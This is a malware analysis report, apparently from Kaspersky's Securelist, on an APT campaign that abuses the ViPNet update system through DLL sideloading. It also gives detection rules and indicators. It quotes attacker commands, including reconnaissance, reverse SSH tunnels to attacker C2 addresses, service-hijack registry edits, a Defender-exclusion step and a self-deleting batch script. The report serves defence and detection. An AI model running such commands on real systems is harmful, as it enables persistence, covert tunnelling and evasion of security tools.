惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
Microsoft Azure Blog
Microsoft Azure Blog
大猫的无限游戏
大猫的无限游戏
月光博客
月光博客
V
V2EX
PCI Perspectives
PCI Perspectives
Latest news
Latest news
博客园 - 三生石上(FineUI控件)
C
CERT Recently Published Vulnerability Notes
W
WeLiveSecurity
Last Week in AI
Last Week in AI
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
P
Palo Alto Networks Blog
T
The Exploit Database - CXSecurity.com
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
WordPress大学
WordPress大学
V
Vulnerabilities – Threatpost
H
Heimdal Security Blog
Attack and Defense Labs
Attack and Defense Labs
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
Hacker News: Ask HN
Hacker News: Ask HN
博客园 - 叶小钗
V
Visual Studio Blog
Jina AI
Jina AI
P
Proofpoint News Feed
罗磊的独立博客
SecWiki News
SecWiki News
J
Java Code Geeks
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
L
LINUX DO - 热门话题
Security Archives - TechRepublic
Security Archives - TechRepublic
The Hacker News
The Hacker News
Hugging Face - Blog
Hugging Face - Blog
N
News and Events Feed by Topic
NISL@THU
NISL@THU
T
Tailwind CSS Blog
T
Tenable Blog
Recent Commits to openclaw:main
Recent Commits to openclaw:main
Recent Announcements
Recent Announcements
H
Hacker News: Front Page
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
T
Tor Project blog
宝玉的分享
宝玉的分享
Help Net Security
Help Net Security
S
Security Affairs
Microsoft Security Blog
Microsoft Security Blog
Google DeepMind News
Google DeepMind News
F
Fortinet All Blogs
G
GRAHAM CLULEY

Securelist

GoSerpent backdoor attacks in Southeast Asia OkoBot framework infection chain Threat landscape for industrial automation systems. Q1 2026 When checking the URL isn't enough: phishing via the Microsoft identity platform Armored Likho's new weapon: BusySnake Stealer How to improve your organization's security based on compromise assessment findings How a single ScreenConnect incident exposed a massive campaign How the ToddyCat APT group gains access to Gmail accounts The Gentlemen RaaS: rapid growth and a new ransomware variant CVE-2024-2658 vulnerability in Schneider Electric software: risks to industrial control systems Threat landscape for SMBs in 2026: fake AI tools, phishing and more StrikeShark: a new campaign involving a custom SharkLoader and Cobalt Strike Beacon An unknown actor distributes malicious VBS scripts via WhatsApp Gamers beware: malicious wallpapers on Steam found stealing accounts Argamal: Malware hidden in hentai games Wardriving assessment across Mexico: Preparing for the 2026 World Cup Containers on fire: from container escapes to supply chain attacks Security risks for OpenClaw users and how to mitigate them What’s in the container? Analyzing vulnerabilities, risks and protection with Kaspersky Container Security and Pirates in the crosshairs: how one cybercrime gang has been infecting book, movie, and TV show fans for years Cloud Atlas activity in the second half of 2025 and early 2026: new tools and a new payload How an image could compromise your Mac: understanding an ExifTool vulnerability (CVE-2026-3102) IT threat evolution in Q1 2026. Mobile statistics IT threat evolution in Q1 2026. Non-mobile statistics Kimsuky targets organizations with PebbleDash-based tools State of ransomware in 2026 CVE-2025-68670: an RCE vulnerability in the xrdp server The vulnerability landscape in Q1 2026 OceanLotus suspected of distributing ZiChatBot malware via wheel packages in PyPI How to spot a suspicious website “Legitimate” phishing: how attackers weaponize Amazon SES to bypass email security PhantomRPC: A new privilege escalation technique in Windows RPC Threat landscape for industrial automation systems in Q4 2025 JanelaRAT: a financial threat targeting users in Latin America The long road to your crypto: ClipBanker and its marathon infection chain Financial cyberthreats in 2025 and the outlook for 2026 A laughing RAT: CrystalX combines spyware, stealer, and prankware features An AI gateway designed to steal your data Coruna: the framework used in Operation Triangulation Anatomy of a Cyber World Global Report 2026 The SOC Files: Time to “Sapecar”. Unpacking a new Horabot campaign in Mexico Free real estate: GoPix, the banking Trojan living off your memory BeatBanker: A dual‑mode Android Trojan Exploits and vulnerabilities in Q4 2025
HelloNet campaign: a threat via the ViPNet update system
Konstantin Isakov · 2026-07-16 · via Securelist

UPD 16.07.2026: Added rules to protect companies using our SIEM system Kaspersky SIEM, and listed events for developing custom detection rules or conducting Threat hunting.

UPD 16.07.2026: Added detection of the malicious activity using Kaspersky Managed Detection and Response.

UPD 16.07.2026: Added detection rules and examples using KEDR Expert.

UPD 16.07.2026: Added detection of the malicious campaign in network traffic using Kaspersky Anti Targeted Attack (KATA) with the NDR module.

UPD 16.07.2026: Updated the list of Indicators of Compromise (IoCs) and TTPs.

We discovered a new APT attack using previously unknown tooling, which started at least in May 2026 and remains active at the time of publication. It is notable in that the implants used during it were launched through the ViPNet update system (a software suite for creating secure networks). During our research, we identified attempts of targeted infection of large Russian organizations from the government, energy, transport, education, and logistics sectors, as well as industry. This is not the first time an advanced group has targeted computers connected to ViPNet networks. For example, last year we discovered a complex backdoor mimicking ViPNet updates.

Persistence via the update system

On one of the analyzed systems, we identified a malicious file named wtsapi32.dll in the directory C:\Program Files (x86)\InfoTeCS\VIPNet Update System, which belongs to the ViPNet suite update system. By placing the file in this directory, the attackers implement the DLL Sideloading technique — the ViPNet update system executable file itcsrvup64.exe, which is launched at OS startup, is susceptible to it. Thus, during this attack, the attackers tried to implement persistence on the system through the ViPNet software update component.

HelloInjector — a loader for additional malicious components

The wtsapi32.dll component is a loader, which we named HelloInjector. Its main goal is to inject its code into the svchost.exe process and launch the malicious payload. After launch, the malware checks the process in the context of which it was launched. If the name of the main process is not svchost.exe, the loader starts iterating through all processes running in the operating system. It looks for a process whose name contains the string svchost, and the command line contains the string netsvcs. If such a process is found, the loader injects itself into the target process using the NtWriteVirtualMemory and NtCreateThreadEx functions.

After restarting in the new process, the loader checks the process name again for the presence of the string svchost. Having confirmed the successful check, HelloInjector loads and executes the malicious payload in memory, which is stored in its body in plain text.

The malicious payload, which we named HelloProxy, is simultaneously a hidden proxy and a loader for the following modules sent by the command server. It works by intercepting the NtDeviceIoControlFile, closesocket, and shutdown functions. Their interception is carried out using the Microsoft Detours library.

The handlers of the closesocket and shutdown functions prevent the premature closing of sockets used for interaction with the C2. In turn, the handler of the NtDeviceIoControlFile function contains the main malicious logic. Its code implements the interception of two IOCTL codes:

  • AFD_RECV (0x12017)
  • AFD_GET_TDI_HANDLES (0x12037)

These codes are used during socket operations — their interception allows the malware to hinder security solutions operating in user mode for filtering network connections. Kaspersky security solutions detect such activity and prevent infection attempts at all stages.

The AFD_GET_TDI_HANDLES handler is responsible for socket registration, and the AFD_RECV handler initiates the processing of incoming traffic. It is worth noting that every incoming message that triggered the processing of the AFD_RECV code is logged to the file C:\users\public\tesh4RPC.txt in the format:

threadid: <Thread ID> pid=<PID>\r\n

After installing the interceptors, the malware starts listening on ports 5003 and 5060 in anticipation of the first commands from the C2 server. In order to distinguish the command server traffic from the rest of the traffic, the implant implements a handshake process: it sends two bytes 0x0502 through the socket and expects to receive a message containing the string ASDFASFSAFASDF. After the successful completion of the handshake, the processing of incoming commands continues.

Depending on the received command, there are two execution branches:

  • Working as a proxy. The malware accepts strings in the following format:

    Afterwards, it creates new sockets and starts forwarding traffic between them.
  • Working as a loader. The malware accepts an executable file from the command server, after which it loads it into the memory of its own process and launches it in a separate thread.

During the research, we managed to discover two malicious payloads that were injected into the svchost process, likely as a result of the previously described loader’s operation:

  • An implant, which we named HelloExecutor, with the help of which attackers can execute commands on the infected system;
  • A module for cleaning ViPNet software log files, which we named HelloCleaner. It allows hiding the attackers’ actions in the system.

We established that the HelloExecutor backdoor was used for reconnaissance in the networks of infected organizations. The following shell commands were executed:

query user

ipconfig /all

ping   8.8.8.8  -n  1

net user /do

net group /do

dir "C:\Program Files (x86)"

dir "C:\Program Files (x86)\infotecs\"

dir "C:\Program Files (x86)\infotecs\ViPNet Administrator"

dir "C:\Program Files (x86)\infotecs\ViPNet Client\Export"

dir "C:\Program Files (x86)\infotecs\ViPNet Client"

dir  "С:\ProgramData\Infotecs\ViPNet Administrator\kc\Export\"

dir  "$appdata\Infotecs\ViPNet Administrator\kc\Export\ Dst for network <номер сети удален>"

dir c:\users\[username]

query  user

dir  C:\Users\Public\music

In these commands, the mention of the directory C:\Users\Public\Music is notable. We established that on infected machines, the attackers used this directory when launching an SSH tunnel from the infected infrastructure to the attackers’ command server (5.39.253[.]206). The attackers launched a renamed executable file of the legitimate PuTTY utility (a client for various remote access protocols):

C:\users\public\music\frontpage.exe -C -N -R 8443:[redacted]:5003 sftp@5.39.253[.]206 -P 3522 -pw [redacted]

HelloBackdoor — a Rust-based backdoor for file system manipulations

In addition to this, a backdoor written in the Rust language, which we named HelloBackdoor, was discovered on one of the infected systems. It accepts connections on port 443, waiting for the string 47c6235b4d2611184 (the second half of the MD5 hash of the string hello\n) to activate the backdoor. This backdoor further accepts the following commands:

!upload — upload a file to the infected machine
!down — download a file from the infected machine
!stop — stop the backdoor’s operation. For this, a BAT file is created and executed with the following content:

@echo off

:loop

if exist <selfpath> (

del /F /Q <selfpath>

if exist <selfpath> goto loop

)

sc stop iplircontrol >nul

timeout 5 > nul

sc start iplircontrol > nul

(goto) 2>nul & del /F /Q %0

If the command text did not match the above listed, the command is executed using cmd.exe.

Attribution

During the analysis of one of the wtsapi32.dll file samples, we found an unused string:

GET / HTTP/1.1\r\nHost: news.sina.com\r\nConnection : keep - alive\r\nUpgrade - Insecure - Requests : 1\r\nUser - Agent : Mozilla / 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 145.0.0.0 Safari / 537.36 Edg / 145.0.0.0\r\nAccept : text / html, application / xhtml + xml, application / xml; q = 0.9, image / avif, image / webp, image / apng, */*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\n

It refers to the news portal sina.com, which is popular in China.

In addition, analyzing the strings in the HelloBackdoor backdoor, we established that during compilation, Rust packages (crates) were downloaded from the mirror mirrors.ustc.edu.cn. Most likely, these strings remained in the malicious files unintentionally. However, the probability of using “false flags” implanted by attackers to complicate the attribution process cannot be excluded. At present, we link this campaign to the activities of an unknown Chinese-speaking APT group with a low degree of confidence.

Recommendations

Given that ViPNet software is not the first time being used by advanced attackers to conduct cyberattacks, we recommend paying special attention to the protection of workstations with this software. In particular, network traffic monitoring should be configured on the ports specified in the article for timely detection of signs of compromise.

Countering complex targeted attacks requires a comprehensive approach that combines security technologies operating at various stages of the cyberattack lifecycle. Such a multi-level security model helps not only to detect but also to prevent incidents of this class. This approach is embedded in the architecture of the Kaspersky Next Expert line of solutions, designed to protect businesses from APT-level threats, including attacks similar to the one described in this article.

Kaspersky solutions detect this threat using the following verdicts:

  • Trojan.Win32.Agentb.ttoe,
  • Trojan.Win64.Convagent.gen,
  • Trojan.Win64.Agent.smgpqx
  • HEUR:Trojan.Win64.DllHijacking.gen

Detection by Kaspersky solutions


Kaspersky security solutions, such as Kaspersky Endpoint Detection and Response Expert, successfully detect malicious activity within the described attacks.

One practical method of detection is monitoring renamed PuTTY/Plink binaries rather than relying on the file name: even if the executable is named frontpage.exe, its PE header, version, strings, and hash match the original Plink, which is confirmed by EDR events. Additionally, it is worth paying attention to the specific command line with which the process was launched. The KEDR Expert solution detects this activity using the using_plink_or_putty_for_port_forwarding rule.

It is also important to monitor Process Injection into svchost.exe originating from the ViPNet update process itcsrvup64.exe, since this component should not legitimately inject code into system processes. Such behavior is a characteristic indicator of HelloInjector activity, which uses a trusted and signed process to mask malicious injection. The KEDR Expert solution detects this activity using the vipnet_load_library_code_injection rule.


Another effective way to detect malicious activity associated with ViPNet is monitoring network traffic. The Kaspersky Anti Targeted Attack (KATA) solution with the NDR module detects this activity using the IDS module and a Suricata rule for the HelloBackdoor backdoor activity.

The rule is implemented based on the first packet expected by the malware. It accepts TCP connections on port 443, expecting to receive the command 47c6235b4d2611184 (part of the MD5 hash of the string “hello\n“), which activates the backdoor.


The Kaspersky Managed Detection and Response service detects this attack using the following indicators:

  1. Monitoring the creation of the wtsapi32.dll library in the C:\Program Files (x86)\InfoTeCS\VIPNet Update System directory.
  2. Monitoring the launch of unusual processes (not typical for ViPNet, lacking an InfoTeCS signature) by the ViPNet update process (Itcsrvup64.exe or Itcsrvup.exe).
  3. Creation of library files (.dll) in a directory associated with ViPNet (by default, ViPNet Update System or VIPNET CLIENT) by ViPNet processes.
  4. Atypical activity (file creation/process execution) from an instance of the svchost.exe process.
  5. Creation of executable files in directories that are writable by default (%ProgramData%, %TEMP%, %SystemRoot%\Temp, C:\Users\Public, music|pictures|videos|contacts|links|libraries).
  6. Monitoring the creation of tunnels using ssh or plink processes (identification is performed based on the original PE file name, not the executable file name); the detection is based on the presence of substrings like port:address:port and their variations in the command line.


To protect companies using our Kaspersky SIEM system, the product repository contains rules that help detect such malicious activity.
Reconnaissance of users and groups, as well as network connections using standard Windows utilities, is detected by the following rules:

  • R220_02_Collection of user account information using standard Windows tools
  • R221_01_Windows group discovery via Windows tools
  • R224_02_Remote system discovery via standard Windows tools
  • R224_14_Windows reconnaissance activity
  • R226_02_Collection of information about network connections using standard Windows tools

Also, for developing your own detection rules or conducting Threat hunting, we recommend paying attention to the following events:

  • Creation of suspicious files in the ViPNet update directory C:\Program Files (x86)\InfoTeCS\VIPNet Update System:

    (DeviceEventClassID = '4663' OR DeviceEventClassID = '11')

    AND match(FileName, '.*\\.(exe|dll)')

    AND FileName ilike '%\InfoTeCS\VIPNet Update System\%'

  • Persistence using the DLL Sideloading technique by loading the wtsapi32.dll library into ViPNet update processes Itcsrvup64.exe or Itcsrvup.exe with an invalid signature (Signed not true, SignatureStatus not valid) or a signature that does not contain information about the manufacturer InfoTeCS:

    DeviceEventClassID = 7

    AND match(DestinationProcessName, '.*\\\\(itcsrvup64|itcsrvup)\\.exe')

    AND FileName ilike '%wtsapi32.dll'

    AND FileName ilike '%\InfoTeCS\VIPNet Update System\%'

    AND ((DeviceCustomNumber1 = 0 AND DeviceCustomNumber2 = 0) OR NOT FlexString2 ilike '%InfoTeCS%')

  • Launching non-standard processes from ViPNet update processes Itcsrvup64.exe or Itcsrvup.exe:

    (DeviceEventClassID = '4688' OR DeviceEventClassID = '1')

    AND match(SourceProcessName, '.*\\\\(Itcsrvup64|Itcsrvup)\\.exe')

    AND NOT match(DestinationProcessName, '.*\\\\(wmail|monitor|itcsrvup64)\\.exe')

  • Launching ViPNet update processes Itcsrvup64.exe or Itcsrvup.exe with an invalid signature (Signed not true, SignatureStatus not valid) or a signature that does not contain information about the manufacturer InfoTeCS:
  • Atypical reconnaissance execution from the svchost.exe process:

    (DeviceEventClassID = '4688' OR DeviceEventClassID = '1')

    AND SourceProcessName ilike '%svchost\.exe'

    AND match(DeviceCustomString4, '.*cmd(.exe)?.*\/c\s+(net\s+(use|group)|sc\s+(query|start|stop)|ping|ipconfig|netstat).*')

  • Creation of tunnels using renamed ssh or plink processes:

    DeviceEventClassID = '1'

    AND match(OldFileName, '.*(plink|ssh).*')

    AND DeviceCustomString4 match '\d+:\d+\.\d+\.\d+\.\d+:\d+'

For the correct operation of detection rules and Threat hunting, it is necessary to ensure that events from Windows systems are received by the Kaspersky SIEM system in full, including events with the following identifiers: Sysmon 1, 7, 11, as well as Security 4688, 4663.

Indicators of Compromise

HelloBackdoor
16C211C96735F2FAE9361B89BD7A31BF
1BFE2B9493128574907A8279256A8BCC
f9eed2f0158dc98e7012fb809152209c

HelloBackdoor Droppers:
6001829A128FE264B4403138700C11A8 – infotecs\vipnet client\puh.exe
EE4FF46DDD8489E81447962F927BC3F6 – infotecs\vipnet client\store.exe

Utility for adding exclusions to Windows Defender:
41c938b3cd7e55d4077e34976929b140

wtsapi32.dll
B103CD21280B4061F88B2BCC51394894
9F5606A0755BC633B9BD7DB6D179C09E
0CFDFFC56F0FA325D0C4D24780B46597

5.39.253[.]206
176.32.34[.]135

Detected TTPs:

T1569.002 — System Services: Service Execution

  • "cmd" /c sc start UrBackupClientBackend

T1016 — System Network Configuration Discovery

  • "cmd" /c arp -a
  • "cmd" /c routeprint

T1049 — System Network Connections Discovery

  • "cmd" /c netstat -ano

T1018 — Remote System Discovery

  • "cmd" /c ping mail.ru -n 2

T1082 — System Information Discovery

  • "cmd" /c systeminfo

T1057 — Process Discovery

  • "cmd" /c tasklist

T1007 — System Service Discovery

  • "cmd" /c sc query UrBackupClientBackend

T1083 — File and Directory Discovery

  • "cmd" /c dir temp*.tmp
  • "cmd" /c dir $temp\*.tmp
  • "cmd" /c dir amgmt*
  • "cmd" /c dir $user\desktop\mRemoteNG-Portable-1.76.20.24669
  • "cmd" /c dir $public\libraries\
  • "cmd" /c dir d:\WindowsImageBackup

T1005 — Data from Local System

  • "cmd" /c type $temp\TS_E9E3.tmp
  • "cmd" /c type $temp\Acr6F3D.tmp

T1074.001 — Local Data Staging

  • "cmd" /c copy appdata\infotecs\*\APN000B.txt $public\libraries\

T1070.004 — Indicator Removal: File Deletion

  • "cmd" /c del $windir\amgmt.dll
  • "cmd" /c del $public\libraries\APN000B.txt

T1543.003 — Create or Modify System Process: Windows Service

  • sc stop AppMgmt
  • sc delete AppMgmt
  • sc create AppMgmt binpath= "system32\svchost.exe -k netsvcs" type= share start= auto displayname= "Application Management"
  • sc description AppMgmt "Processes installation, removal, and enumeration requests for software deployed through Group Policy. If the service is disabled, users will be unable to install, remove, or enumerate software deployed through Group Policy. If this service is disabled, any services that explicitly depend on it will fail to start."
  • sc failure AppMgmt reset= 0 actions= restart/0

T1112 — Modify Registry

  • reg add HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt\Parameters /v ServiceDll /t REG_EXPAND_SZ /d $system32\$selfname.dll
  • reg add HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt\Parameters /v ServiceMain /t REG_SZ /d ServiceMain

T1036 — Masquerading (service, description, and DLL masquerade as the legitimate Application Management)

  • "cmd" /c copy $windir\amgmt* $system32\

T1059.003 — Execution of auxiliary scripts

  • "cmd" /c $windir\amgmt.bat
  • "cmd" /c $windir\insru.cmd

T1105 — Ingress Tool Transfer

  • "cmd" /c $programfiles\7-zip\7z.exe x $windir\Irsoisas.zip -o"$windir

T1562.001 — Impair Defenses: Disable or Modify Tools

  • "cmd" /c \$windir\puh.exe add $windir\autoit3.exe white

T1059 / T1218 — Proxy execution via AutoIt

  • "cmd" /c \$windir\autoit3.exe \$windir\data.dat

T1572 — Protocol Tunneling / T1090 — Proxy / T1021.004 — Remote Services: SSH

  • c:\users\[username]\libraries\pagent.exe -C -N -R 6443:[redacted] root@176.32.34.135 -P 48022 -pw [redacted]